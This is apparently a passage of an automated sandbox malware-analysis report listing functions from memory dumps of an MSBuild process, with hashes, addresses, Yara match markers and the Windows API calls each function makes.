                                                                                                                                                                                    • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                    • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                                                    • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                                                    • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2692324296-0
                                                                                                                                                                                    • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                    • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                                                    • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                                                    • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                    • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                    • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                                                                    • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                                                    • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                    • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                    • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                    • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: BG3i@
                                                                                                                                                                                    • API String ID: 0-2407888476
                                                                                                                                                                                    • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                    • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                    • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                    • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                    • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                                                                    • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                                                                                                    • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: >G
                                                                                                                                                                                    • API String ID: 0-1296849874
                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                    • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                    • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                    • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                                                                    • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                                                                    • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                                                                    • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                    • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                    • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                    • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                    • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                                                                    • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                                                                                                    • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                    • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
